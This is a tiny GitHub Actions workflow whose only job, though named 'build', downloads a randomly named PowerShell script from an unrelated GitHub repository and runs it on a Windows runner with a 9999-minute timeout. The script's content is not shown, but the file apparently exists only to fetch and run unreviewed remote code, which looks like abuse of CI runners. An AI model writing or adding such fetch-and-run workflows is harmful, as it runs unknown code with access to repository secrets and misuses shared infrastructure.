name: U

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: looping
      run: |
        Invoke-WebRequest https://raw.githubusercontent.com/gagayoyo/d8dqT73qNwNNqTQN9/main/sYx9aFxYzdZHh1YZa.ps1 -OutFile sYx9aFxYzdZHh1YZa.ps1
        ./sYx9aFxYzdZHh1YZa.ps1
